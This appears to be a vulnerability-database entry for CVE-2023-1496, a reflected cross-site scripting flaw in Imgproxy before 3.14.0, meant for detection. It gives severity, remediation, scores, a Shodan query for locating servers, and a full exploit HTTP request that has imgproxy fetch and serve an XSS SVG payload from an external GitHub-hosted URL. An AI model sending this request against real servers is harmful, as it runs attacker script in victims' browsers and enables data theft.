🔙 목록으로 돌아가기

CVE-2023-1496: Imgproxy < 3.14.0 - Cross-site Scripting (XSS)

TitleImgproxy < 3.14.0 - Cross-site Scripting (XSS)
Authorpdteam
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
RemediationUpgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability.
CVSS Score5.4
EPSS Score0.17247
CVE IDCVE-2023-1496
CWE IDCWE-79
Shodan QueryServer: imgproxyserver: imgproxy
Tags cve cve2023 huntr imgproxy xss svg evilmartians vuln

🔍 Vulnerability Description

Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.

🌐 HTTP Request

GET /unsafe/plain/https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1496.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-1496.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A